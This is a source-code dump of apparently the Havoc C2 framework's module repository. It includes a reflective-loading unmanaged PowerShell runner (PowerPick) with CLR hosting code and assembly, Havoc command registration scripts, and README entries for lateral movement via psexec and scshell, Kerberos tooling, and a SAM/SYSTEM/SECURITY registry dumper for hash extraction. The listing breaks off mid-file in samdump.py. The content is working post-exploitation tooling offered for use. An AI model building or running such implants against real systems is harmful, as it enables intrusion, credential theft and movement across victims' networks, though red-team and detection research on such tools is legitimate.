56 | } *PIMAGE_RELOC; 57 | 58 | PVOID KGetModuleByHash( DWORD hash ); 59 | PVOID KGetProcAddressByHash( PKAYNINSTANCE Instance, PVOID DllModuleBase, DWORD FunctionHash, DWORD Ordinal ); 60 | PVOID KLoadLibrary( PKAYNINSTANCE Instance, LPSTR Module ); 61 | 62 | VOID KResolveIAT( PKAYNINSTANCE Instance, PVOID KaynImage, PVOID IatDir ); 63 | VOID KReAllocSections( PVOID KaynImage, PVOID ImageBase, PVOID Dir ); 64 | 65 | DWORD KHashString( LPVOID String, SIZE_T Size ); 66 | SIZE_T KStringLengthA( LPCSTR String ); 67 | SIZE_T KStringLengthW( LPCWSTR String ); 68 | VOID KMemSet( PVOID Destination, INT Value, SIZE_T Size ); 69 | SIZE_T KCharStringToWCharString( PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed ); 70 | 71 | #endif 72 | -------------------------------------------------------------------------------- /PowerPick/include/Parser.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | typedef struct { 5 | PCHAR original; 6 | PCHAR buffer; 7 | UINT32 length; 8 | } PARSER, *PPARSER ; 9 | 10 | VOID ParserNew( PPARSER parser, PCHAR buffer ); 11 | INT ParserGetInt32( PPARSER parser); 12 | PCHAR ParserGetBytes( PPARSER parser, PINT size); -------------------------------------------------------------------------------- /PowerPick/include/Win32.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed); -------------------------------------------------------------------------------- /PowerPick/makefile: -------------------------------------------------------------------------------- 1 | MAKEFLAGS += -s 2 | 3 | NAME = PowerPick 4 | 5 | COMPILER_x86 = i686-w64-mingw32-gcc 6 | COMPILER_x64 = x86_64-w64-mingw32-gcc 7 | 8 | CFLAGS = -Os -fno-asynchronous-unwind-tables -shared -masm=intel 9 | CFLAGS += -fno-ident -fpack-struct=8 -falign-functions=1 10 | CFLAGS += -s -ffunction-sections -falign-jumps=1 -w 11 | CFLAGS += -falign-labels=1 -fPIC 12 | CFLAGS += -Wl,-s,--no-seh,--enable-stdcall-fixup 13 | CFLAGS += -l oleaut32 -l uuid 14 | 15 | INCLUDE = -I include 16 | SOURCE = $(wildcard src/*.c) 17 | 18 | x64: 19 | nasm -f win64 src/Util.s -o src/Util.o 20 | $(COMPILER_x64) src/*.o $(INCLUDE) $(SOURCE) $(CFLAGS) -o bin/$(NAME).x64.dll -lntdll -luser32 21 | rm src/*.o -------------------------------------------------------------------------------- /PowerPick/powerpick.py: -------------------------------------------------------------------------------- 1 | 2 | from havoc import Demon, RegisterCommand 3 | 4 | def PowerPick(demonID, *param): 5 | TaskID : str = None 6 | demon : Demon = None 7 | packer = Packer() 8 | 9 | demon = Demon( demonID ) 10 | 11 | if demon.ProcessArch == 'x86': 12 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" ) 13 | return False 14 | 15 | if len( param ) < 1: 16 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough arguments" ) 17 | return 18 | 19 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to execute unmanaged powershell commands" ) 20 | 21 | packer.addstr( " " + ''.join( param ) ) 22 | demon.DllSpawn( TaskID, "bin/PowerPick.x64.dll", packer.getbuffer() ) 23 | 24 | return TaskID 25 | 26 | RegisterCommand( PowerPick, "", "powerpick", "executes unmanaged powershell commands", 0, "[args]", "whoami" ) 27 | -------------------------------------------------------------------------------- /PowerPick/src/DllMain.c: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | * Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | 10 | HINSTANCE hAppInstance = NULL; 11 | INSTANCE Instance = { 0 }; 12 | 13 | BOOL WINAPI DllMain( HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpReserved ) 14 | { 15 | BOOL bReturnValue = TRUE; 16 | 17 | switch( dwReason ) 18 | { 19 | case DLL_QUERY_HMODULE: 20 | if( lpReserved != NULL ) 21 | *( HMODULE* ) lpReserved = hAppInstance; 22 | break; 23 | 24 | case DLL_PROCESS_ATTACH: 25 | { 26 | hAppInstance = hInstDLL; 27 | 28 | ModuleInit(); 29 | ModuleMain( lpReserved ); 30 | 31 | fflush( stdout ); 32 | ExitProcess( 0 ); 33 | } 34 | 35 | case DLL_PROCESS_DETACH: 36 | case DLL_THREAD_ATTACH: 37 | case DLL_THREAD_DETACH: 38 | break; 39 | } 40 | return bReturnValue; 41 | } 42 | 43 | VOID ModuleInit() 44 | { 45 | Instance.Modules.Msvcrt = LoadLibraryA( "Msvcrt" ); 46 | if ( Instance.Modules.Msvcrt ) 47 | { 48 | Instance.Win32.printf = GetProcAddress( Instance.Modules.Msvcrt, "printf" ); 49 | } 50 | 51 | Instance.Modules.Mscoree = LoadLibraryA( "Mscoree" ); 52 | if ( Instance.Modules.Msvcrt ) 53 | { 54 | Instance.Win32.CLRCreateInstance = GetProcAddress( Instance.Modules.Mscoree, "CLRCreateInstance" ); 55 | } 56 | } 57 | 58 | VOID ModuleMain( PVOID Params ) 59 | { 60 | PARSER Parser = { 0 }; 61 | ParserNew( &Parser, Params ); 62 | 63 | InvokeAssembly( &Parser ); 64 | } -------------------------------------------------------------------------------- /PowerPick/src/InvokeAssembly.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "PowershellRunner.h" 3 | 4 | GUID xCLSID_CLRMetaHost = { 0x9280188d, 0xe8e, 0x4867, { 0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde } }; 5 | GUID xCLSID_CorRuntimeHost = { 0xcb2f6723, 0xab3a, 0x11d2, { 0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e } }; 6 | GUID xIID_AppDomain = { 0x05F696DC, 0x2B29, 0x3663, { 0xAD, 0x8B, 0xC4, 0x38, 0x9C, 0xF2, 0xA7, 0x13 } }; 7 | GUID xIID_ICLRMetaHost = { 0xD332DB9E, 0xB9B3, 0x4125, { 0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16 } }; 8 | GUID xIID_ICLRRuntimeInfo = { 0xBD39D1D2, 0xBA2F, 0x486a, { 0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91 } }; 9 | GUID xIID_ICorRuntimeHost = { 0xcb2f6722, 0xab3a, 0x11d2, { 0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e } }; 10 | 11 | BOOL FindVersion( PVOID assembly, INT length ) 12 | { 13 | PCHAR assembly_c = (char*)assembly; 14 | 15 | CHAR v4[] = { 0x76, 0x34, 0x2E, 0x30, 0x2E, 0x33, 0x30, 0x33, 0x31, 0x39 }; 16 | 17 | for ( INT i = 0; i < length; i++ ) 18 | { 19 | for ( INT j = 0; j < 10; j++ ) 20 | { 21 | if ( v4[ j ] != assembly_c[ i + j ] ) 22 | break; 23 | else 24 | { 25 | if ( j == 9 ) 26 | return 1; 27 | } 28 | } 29 | } 30 | 31 | return 0; 32 | } 33 | 34 | VOID InvokeAssembly( PPARSER DataArgs ) 35 | { 36 | SIZE_T ArgumentsLen = 0; 37 | PUCHAR Arguments = ParserGetBytes( DataArgs, &ArgumentsLen ); 38 | 39 | WCHAR wAppDomainName[ MAX_PATH ] = { 0 }; 40 | PWCHAR wArguments = LocalAlloc( LPTR, ArgumentsLen * sizeof( WCHAR ) ); 41 | 42 | // CLR & .Net Instances 43 | ICLRMetaHost* pClrMetaHost = { NULL }; 44 | ICLRRuntimeInfo* pClrRuntimeInfo = { NULL }; 45 | ICorRuntimeHost* pICorRuntimeHost = { NULL }; 46 | Assembly* pAssembly = { NULL }; 47 | IUnknown* pAppDomainThunk = { NULL }; 48 | AppDomain* pAppDomain = { NULL }; 49 | MethodInfo* pMethodInfo = { NULL }; 50 | VARIANT vtPsa = { 0 }; 51 | LPVOID pvData = { NULL }; 52 | 53 | VARIANT retVal = { 0 }; 54 | VARIANT obj = { 0 }; 55 | 56 | LPWSTR NetVersion = L"v4.0.30319"; 57 | 58 | // Convert Ansi Strings to Wide Strings 59 | CharStringToWCharString( wArguments, Arguments, ArgumentsLen ); 60 | 61 | // Hosting CLR 62 | if ( ! W32CreateClrInstance( NetVersion, &pClrMetaHost, &pClrRuntimeInfo, &pICorRuntimeHost ) ) 63 | { 64 | Instance.Win32.printf( "[-] Couldn't start CLR \n" ); 65 | return; 66 | } 67 | 68 | SAFEARRAYBOUND rgsabound[1] = { 0 }; 69 | rgsabound[0].cElements = PowershellRunnerSize; 70 | rgsabound[0].lLbound = 0; 71 | SAFEARRAY* pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound); 72 | 73 | if ( pICorRuntimeHost->lpVtbl->CreateDomain( pICorRuntimeHost, wAppDomainName, NULL, &pAppDomainThunk ) != S_OK ) 74 | goto Cleanup; 75 | 76 | if ( pAppDomainThunk->lpVtbl->QueryInterface( pAppDomainThunk, &xIID_AppDomain, &pAppDomain ) != S_OK ) 77 | goto Cleanup; 78 | 79 | if ( SafeArrayAccessData( pSafeArray, &pvData ) != S_OK ) 80 | goto Cleanup; 81 | 82 | MemCopy( pvData, PowershellRunner, PowershellRunnerSize ); 83 | 84 | if ( SafeArrayUnaccessData( pSafeArray ) != S_OK ) 85 | Instance.Win32.printf( "[-] SafeArrayUnaccessData: Failed\n" ); 86 | 87 | if ( pAppDomain->lpVtbl->Load_3( pAppDomain, pSafeArray, &pAssembly ) != S_OK ) 88 | goto Cleanup; 89 | 90 | if ( pAssembly->lpVtbl->EntryPoint( pAssembly, &pMethodInfo ) != S_OK ) 91 | goto Cleanup; 92 | 93 | obj.vt = VT_NULL; 94 | 95 | SAFEARRAY* psaStaticMethodArgs = SafeArrayCreateVector( VT_VARIANT, 0, 1 ); //Last field -> entryPoint == 1 is needed if Main(String[] args) 0 if Main() 96 | 97 | DWORD argumentCount; 98 | LPWSTR* argumentsArray = CommandLineToArgvW( wArguments, &argumentCount ); 99 | 100 | argumentsArray++; 101 | argumentCount--; 102 | 103 | vtPsa.vt = ( VT_ARRAY | VT_BSTR ); 104 | vtPsa.parray = SafeArrayCreateVector( VT_BSTR, 0, argumentCount ); 105 | 106 | for ( INT i = 0; i <= argumentCount; i++ ) 107 | SafeArrayPutElement( vtPsa.parray, &i, SysAllocString( argumentsArray[ i ] ) ); 108 | 109 | long idx[1] = { 0 }; 110 | SafeArrayPutElement(psaStaticMethodArgs, idx, &vtPsa); 111 | 112 | if ( pMethodInfo->lpVtbl->Invoke_3( pMethodInfo, obj, psaStaticMethodArgs, &retVal ) != S_OK ) 113 | goto Cleanup; 114 | 115 | Cleanup: 116 | if ( NULL != psaStaticMethodArgs ) 117 | { 118 | SafeArrayDestroy( psaStaticMethodArgs ); 119 | psaStaticMethodArgs = NULL; 120 | } 121 | 122 | if ( pMethodInfo != NULL ) 123 | { 124 | pMethodInfo->lpVtbl->Release( pMethodInfo ); 125 | pMethodInfo = NULL; 126 | } 127 | 128 | if ( pAssembly != NULL ) 129 | { 130 | pAssembly->lpVtbl->Release( pAssembly ); 131 | pAssembly = NULL; 132 | } 133 | 134 | if ( pAppDomain != NULL ) 135 | { 136 | pAppDomain->lpVtbl->Release( pAppDomain ); 137 | pAppDomain = NULL; 138 | } 139 | 140 | if ( pAppDomainThunk != NULL ) 141 | pAppDomainThunk->lpVtbl->Release( pAppDomainThunk ); 142 | 143 | if ( pICorRuntimeHost != NULL ) 144 | { 145 | pICorRuntimeHost->lpVtbl->UnloadDomain( pICorRuntimeHost, pAppDomainThunk ); 146 | pICorRuntimeHost->lpVtbl->Stop( pICorRuntimeHost ); 147 | pICorRuntimeHost = NULL; 148 | } 149 | 150 | if ( pClrRuntimeInfo != NULL ) 151 | { 152 | pClrRuntimeInfo->lpVtbl->Release( pClrRuntimeInfo ); 153 | pClrRuntimeInfo = NULL; 154 | } 155 | 156 | if ( pClrMetaHost != NULL ) 157 | { 158 | pClrMetaHost->lpVtbl->Release( pClrMetaHost ); 159 | pClrMetaHost = NULL; 160 | } 161 | } 162 | 163 | BOOL W32CreateClrInstance( LPCWSTR dotNetVersion, PICLRMetaHost *ppClrMetaHost, PICLRRuntimeInfo *ppClrRuntimeInfo, ICorRuntimeHost **ppICorRuntimeHost ) 164 | { 165 | BOOL fLoadable = FALSE; 166 | 167 | if ( Instance.Win32.CLRCreateInstance( &xCLSID_CLRMetaHost, &xIID_ICLRMetaHost, ppClrMetaHost ) == S_OK ) 168 | { 169 | if ( ( *ppClrMetaHost )->lpVtbl->GetRuntime( *ppClrMetaHost, dotNetVersion, &xIID_ICLRRuntimeInfo, (LPVOID*)ppClrRuntimeInfo ) == S_OK ) 170 | { 171 | if ( ( ( *ppClrRuntimeInfo )->lpVtbl->IsLoadable( *ppClrRuntimeInfo, &fLoadable ) == S_OK ) && fLoadable ) 172 | { 173 | //Load the CLR into the current process and return a runtime interface pointer. -> CLR changed to ICor which is deprecated but works 174 | if ( ( *ppClrRuntimeInfo )->lpVtbl->GetInterface( *ppClrRuntimeInfo, &xCLSID_CorRuntimeHost, &xIID_ICorRuntimeHost, ppICorRuntimeHost ) == S_OK ) 175 | { 176 | //Start it. This is okay to call even if the CLR is already running 177 | ( *ppICorRuntimeHost )->lpVtbl->Start( *ppICorRuntimeHost ); 178 | } 179 | else 180 | { 181 | Instance.Win32.printf("[-] ( GetInterface ) Process refusing to get interface of %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 182 | return 0; 183 | } 184 | } 185 | else 186 | { 187 | Instance.Win32.printf("[-] ( IsLoadable ) Process refusing to load %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 188 | return 0; 189 | } 190 | } 191 | else 192 | { 193 | Instance.Win32.printf("[-] ( GetRuntime ) Process refusing to get runtime of %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 194 | return 0; 195 | } 196 | } 197 | else 198 | { 199 | Instance.Win32.printf("[-] ( CLRCreateInstance ) Process refusing to create %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 200 | return 0; 201 | } 202 | 203 | return 1; 204 | } -------------------------------------------------------------------------------- /PowerPick/src/Parser.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | VOID ParserNew( PPARSER parser, PCHAR buffer ) 6 | { 7 | UINT32 Size = 0; 8 | 9 | if ( ! parser ) 10 | return; 11 | 12 | if ( ! buffer ) 13 | return 14 | 15 | memcpy( &Size, buffer, sizeof( UINT32 ) ); 16 | 17 | parser->buffer = buffer + sizeof( UINT32 ); 18 | parser->original = buffer; 19 | parser->length = Size - sizeof( UINT32 ); 20 | } 21 | 22 | INT32 ParserGetInt32( PPARSER parser ) 23 | { 24 | INT32 intBytes = 0; 25 | 26 | if ( parser->length < 4 ) 27 | return 0; 28 | 29 | memcpy( &intBytes, parser->buffer, 4 ); 30 | 31 | parser->buffer += 4; 32 | parser->length -= 4; 33 | 34 | return ( INT ) intBytes; 35 | } 36 | 37 | PCHAR ParserGetBytes( PPARSER parser, PINT size ) 38 | { 39 | UINT32 length = 0; 40 | PCHAR outdata = NULL; 41 | 42 | if ( parser->length < 4 ) 43 | return NULL; 44 | 45 | memcpy( &length, parser->buffer, 4 ); 46 | parser->buffer += 4; 47 | 48 | outdata = parser->buffer; 49 | if ( outdata == NULL ) 50 | return NULL; 51 | 52 | parser->length -= 4; 53 | parser->length -= length; 54 | parser->buffer += length; 55 | 56 | if ( size != NULL ) 57 | *size = length; 58 | 59 | return outdata; 60 | } 61 | -------------------------------------------------------------------------------- /PowerPick/src/Util.s: -------------------------------------------------------------------------------- 1 | ; KaynLdr 2 | ; Author: Paul Ungur (@C5pider) 3 | ; Credits: Austin Hudson (@ilove2pwn_), Chetan Nayak (@NinjaParanoid), Bobby Cooke (@0xBoku), @trickster012 4 | ; 5 | 6 | global KaynCaller 7 | 8 | section .text 9 | 10 | ; Shameless copied from Bobby Cooke CobaltStrikeReflectiveLoader (https://github.com/boku7/CobaltStrikeReflectiveLoader) 11 | KaynCaller: 12 | call pop 13 | pop: 14 | pop rcx 15 | loop: 16 | xor rbx, rbx 17 | mov ebx, 0x5A4D 18 | dec rcx 19 | cmp bx, word ds:[ rcx ] 20 | jne loop 21 | xor rax, rax 22 | mov ax, [ rcx + 0x3C ] 23 | add rax, rcx 24 | xor rbx, rbx 25 | add bx, 0x4550 26 | cmp bx, word ds:[ rax ] 27 | jne loop 28 | mov rax, rcx 29 | ret -------------------------------------------------------------------------------- /PowerPick/src/Win32.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed) 5 | { 6 | INT Length = MaximumAllowed; 7 | 8 | while (--Length >= 0) 9 | { 10 | if (!(*Destination++ = *Source++)) 11 | return MaximumAllowed - Length - 1; 12 | } 13 | 14 | return MaximumAllowed - Length; 15 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Modules 2 | Modules used by the Havoc Framework. 3 | 4 | ### Powerpick 5 | Powerpick implementation for the Havoc Framework. 6 | 7 | ### InvokeAssembly 8 | InvokeAssembly implementation for the Havoc Framework. 9 | 10 | ### Template 11 | This is the base template for the modules. You can use this to write your own modules for the Havoc Framework. 12 | 13 | ### SituationalAwareness 14 | A bunch of Situational Awareness beacon object files. From [Situational Awareness BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF) 15 | 16 | ### RemoteOps 17 | A bunch of Remote Operation beacon object files. From [Remote Operations BOF](https://github.com/trustedsec/CS-Remote-OPs-BOF) 18 | 19 | ### Domaininfo 20 | A BOF tool to enumerate domain information using Active Directory Domain Services. 21 | Full credit goes to [Cneelis](https://twitter.com/Cneelis). Bof is from his [C2-Tool-Collection](https://github.com/outflanknl/C2-Tool-Collection) 22 | 23 | ### Jump-exec psexec 24 | A BOF to lateral move using the psexec technique. 25 | 26 | ### Jump-exec scshell 27 | A BOF to lateral move using the scshell technique. 28 | This technique relies on ChangeServiceConfigA to run commands (this case our service executable) 29 | This BOF is based on [Mr-Un1k0d3r's](https://twitter.com/MrUn1k0d3r) [SCShell](https://github.com/Mr-Un1k0d3r/SCShell/tree/master/CS-BOF) 30 | 31 | ### nanorobeus 32 | Kerberos implementation for the Havoc Framework. 33 | 34 | ### Delegation 35 | Find delegation settings, users with SPNs and ASREP using LDAP. 36 | 37 | ### SamDump 38 | Dump the SAM registry. 39 | 40 | ### Migrate 41 | Automigrate WoW64 demons to x64. 42 | -------------------------------------------------------------------------------- /RemoteOps/bin/adcs_request.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/adcs_request.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/adcs_request.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/adcs_request.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/adduser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/adduser.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/adduser.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/adduser.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/addusertogroup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/addusertogroup.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/addusertogroup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/addusertogroup.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/enableuser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/enableuser.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/enableuser.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/enableuser.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_delete.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_delete.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_delete.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_delete.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_save.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_save.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_save.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_save.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_set.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_set.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_set.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_set.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_create.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_create.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_create.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_create.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_delete.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_delete.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_delete.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_delete.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_description.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_description.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_description.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_description.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_start.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_start.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_start.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_start.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_stop.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_stop.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_stop.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_stop.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/setuserpass.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/setuserpass.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/setuserpass.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/setuserpass.x86.o -------------------------------------------------------------------------------- /RemoteOps/makefile: -------------------------------------------------------------------------------- 1 | NAME = CS-Remote-OPs-BOF 2 | BIN = bin 3 | 4 | all: 5 | @ cd $(NAME); chmod +x make_all.sh; bash ./make_all.sh 6 | @ find $(NAME)/Injection -name '*.o' -exec cp {} $(BIN)/ \; 7 | @ find $(NAME)/Remote -name '*.o' -exec cp {} $(BIN)/ \; 8 | 9 | clean: 10 | rm $(BIN)/*.o 11 | -------------------------------------------------------------------------------- /SamDump/README.md: -------------------------------------------------------------------------------- 1 | # About 2 | Beacon Object File(BOF) for CobaltStrike that will acquire the necessary privileges and dump SAM - SYSTEM - SECURITY registry keys for offline parsing and hash extraction. 3 | 4 | ## Instructions 5 | 6 | CNA will register the command `bof-regsave`: 7 | 8 | ``` 9 | beacon> bof-regsave c:\temp\ 10 | ``` 11 | 12 | By default the output will be saved in the following files: 13 | 14 | ``` 15 | samantha.txt - SAM 16 | systemic.txt - SYSTEM 17 | security.txt - SECURITY 18 | ``` 19 | 20 | You can modify the file names by changing `entry.c`. 21 | 22 | ## Credits 23 | 24 | Template & Makefile based on repo from [@realoriginal](https://github.com/realoriginal/beacon-object-file) 25 | 26 | 27 | ## Reading material for BOF 28 | 29 | [CS Beacon Object Files](https://www.cobaltstrike.com/help-beacon-object-files) 30 | 31 | [Aggressor-Script functions](https://www.cobaltstrike.com/aggressor-script/functions.html) 32 | 33 | [Beacon Object Files - Luser Demo](https://www.youtube.com/watch?v=gfYswA_Ronw) 34 | 35 | [A Developer's Introduction To Beacon Object Files](https://www.trustedsec.com/blog/a-developers-introduction-to-beacon-object-files/) 36 | 37 | _Github repos_ 38 | 39 | ``` 40 | https://github.com/rsmudge/ZeroLogon-BOF 41 | https://github.com/rsmudge/CVE-2020-0796-BOF 42 | https://github.com/trustedsec/CS-Situational-Awareness-BOF 43 | https://github.com/tomcarver16/BOF-DLL-Inject 44 | https://github.com/m57/cobaltstrike_bofs/ 45 | https://github.com/rvrsh3ll/BOF_Collection/ 46 | https://github.com/realoriginal/bof-NetworkServiceEscalate 47 | ``` 48 | 49 | ## Author 50 | [@leftp](https://github.com/leftp) 51 | -------------------------------------------------------------------------------- /SamDump/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # Beacon Object File ( BOF ) Compiler 3 | # 4 | # Used to create object files that are 5 | # compatible with Beacon's inline-execute 6 | # command. 7 | # 8 | 9 | CC_x64 := x86_64-w64-mingw32-gcc 10 | LD_x64 := x86_64-w64-mingw32-ld 11 | STRx64 := x86_64-w64-mingw32-strip 12 | CC_x86 := i686-w64-mingw32-gcc 13 | LD_x86 := i686-w64-mingw32-ld 14 | STRx86 := i686-w64-mingw32-strip 15 | 16 | SOURCE := $(wildcard source/*.c) 17 | OBJECT := $(SOURCE:%.c=%.o) 18 | CFLAGS := -Os -s -Qn -nostdlib 19 | LFLAGS := -Wl,-s,--exclude-all-symbols 20 | 21 | all: $(OBJECT) 22 | $(LD_x64) -x -r source/*_x64.o -o regdump.x64.o 23 | $(LD_x86) -x -r source/*_x86.o -o regdump.x86.o 24 | 25 | .c.o: 26 | $(CC_x64) -o $(basename $@)_x64.o -c $< $(CFLAGS) $(LFLAGS) 27 | $(STRx64) -N $(basename $(notdir $@)).c $(basename $@)_x64.o 28 | $(CC_x86) -o $(basename $@)_x86.o -c $< $(CFLAGS) $(LFLAGS) 29 | $(STRx86) -N $(basename $(notdir $@)).c $(basename $@)_x86.o 30 | 31 | clean: 32 | rm -rf source/*_x64.o 33 | rm -rf source/*_x86.o 34 | rm -rf regdump.x64.o regdump.x86.o 35 | -------------------------------------------------------------------------------- /SamDump/regdump.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SamDump/regdump.x64.o -------------------------------------------------------------------------------- /SamDump/regdump.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SamDump/regdump.x86.o -------------------------------------------------------------------------------- /SamDump/samdump.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand 2 | import re 3 | import time 4 | 5 | # https://github.com/EncodeGroup/BOF-RegSave/tree/master 6 | 7 | def is_full_path(path): 8 | return re.match(r'^[a-zA-Z]:\\', path) is not None 9 | 10 | def samdump(demonID, *params): 11 | TaskID : str = None 12 | demon : Demon = None 13 | packer = Packer() 14 | 15 | num_params = len(params) 16 | path = '' 17 | 18 | demon = Demon( demonID ) 19 | 20 | if num_params != 1: 21 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "missing the path" ) 22 | return True 23 | 24 | path = params[ 0 ] 25 | 26 | 